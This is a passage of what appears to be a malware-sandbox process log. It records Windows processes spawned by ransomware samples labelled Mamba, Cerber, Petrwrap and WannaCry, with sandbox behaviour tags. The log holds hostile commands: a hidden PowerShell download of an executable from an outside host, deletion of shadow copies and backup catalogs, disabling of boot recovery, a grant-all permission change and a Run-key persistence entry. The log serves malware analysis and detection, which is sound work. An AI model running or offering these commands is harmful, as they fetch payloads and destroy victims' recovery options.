  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=6128 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
  2⤵
  PID:3476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4768 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
  2⤵
  PID:256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=2876 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
  2⤵
  PID:376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5636 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
  2⤵
  PID:432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5356 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
  2⤵
  PID:4920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6240 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
  2⤵
  PID:916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6152 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
  2⤵
  PID:3516
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6328 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
  2⤵
  PID:2080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1612 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
  2⤵
  PID:2860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=960 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
  2⤵
  PID:4444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=4556 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
  2⤵
  PID:3596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5644 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
  2⤵
  PID:3460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6300 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
  2⤵
  PID:2888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1492 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:8
  2⤵
  PID:4928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=4472 --field-trial-handle=1776,i,3908464863159509745,11898905215975833403,131072 /prefetch:1
  2⤵
  PID:1548

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2196

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1200

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:3908

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:4656

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1028

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1392

C:\Users\Admin\Desktop\131.exe
"C:\Users\Admin\Desktop\131.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:744

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3500

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Cerber.zip\cerber.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Cerber.zip\cerber.exe"
1⤵
- Drops startup file
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:1976
- C:\Windows\SysWOW64\netsh.exe
  C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  PID:3480
- C:\Windows\SysWOW64\netsh.exe
  C:\Windows\system32\netsh.exe advfirewall reset
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  PID:1960
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___7MFEY_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  PID:4940
- C:\Windows\SysWOW64\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___XWLTAA0_.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2572
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  PID:1896
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "cerber.exe"
    3⤵
    - Kills process with taskkill
    PID:1788
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 1 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:3136

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\61c61f9f891541efbaf8826ce0a5001e /t 4932 /p 4940
1⤵
PID:780

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2328

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\ClearRead.docx" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4304

C:\Users\Admin\Documents\Ransomware.Petrwrap\svchost.exe
"C:\Users\Admin\Documents\Ransomware.Petrwrap\svchost.exe"
1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Windows directory
PID:2328

C:\Users\Admin\Documents\Ransomware.Petrwrap\svchost.exe
"C:\Users\Admin\Documents\Ransomware.Petrwrap\svchost.exe"
1⤵
PID:4644

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Documents\Ransomware.Petrwrap\myguy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Suspicious use of SetThreadContext
PID:3496
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\8391.exe');
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4892
- C:\Windows\notepad.exe
  "C:\Windows\notepad.exe" -c "C:\Users\Admin\AppData\Local\JesYXqkYNx\cfg"
  2⤵
  PID:1016
- C:\Windows\notepad.exe
  "C:\Windows\notepad.exe" -c "C:\Users\Admin\AppData\Local\JesYXqkYNx\cfgi"
  2⤵
  PID:68

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
PID:2740
- C:\Windows\SysWOW64\attrib.exe
  attrib +h .
  2⤵
  - Views/modifies file attributes
  PID:4868
- C:\Windows\SysWOW64\icacls.exe
  icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1960
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:3856
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 112351720038089.bat
  2⤵
  PID:2908
- - C:\Windows\SysWOW64\cscript.exe
    cscript.exe //nologo m.vbs
    3⤵
    PID:1476
- C:\Windows\SysWOW64\attrib.exe
  attrib +h +s F:\$RECYCLE
  2⤵
  - Views/modifies file attributes
  PID:4260
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected] co
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2548
- - C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
    TaskData\Tor\taskhsvc.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:5028
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b @[email protected] vs
  2⤵
  PID:652
- - C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
    @[email protected] vs
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:848
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      4⤵
      PID:2784
    - - C:\Windows\SysWOW64\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4376
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        
        PID:4088
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:2568
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - Suspicious use of SetWindowsHookEx
  PID:4804
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "wbaseltcdk426" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
  2⤵
  PID:3976
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "wbaseltcdk426" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:1696
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1428
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2860
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:3808
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1200
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:428
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4452
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4884
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:3856
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3976
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4288
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:4192
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4184
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4992
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:4404
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4452
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2924
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:948
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4924
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4724
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:1288
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1772
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2788
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:4940
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:412
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4520
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:600
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4156
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:5036
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:96
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2316
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1176
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:2672
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3488
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1324
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:4988
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4688
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4208
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:2716
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1056
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:3960
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:4624
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1976
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2908
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:2520
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4724
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4584
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:4088
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4640
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:3300
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:1392
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1428
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1236
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:1008
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3768
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4736
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:3488
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5056
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2136
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:2316
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:2588
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:4088
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:4608
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:1696
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:2092
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:2784
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:1392
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:3752
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:236
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:2788
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:4916
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:2568
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:4920
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:4584
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
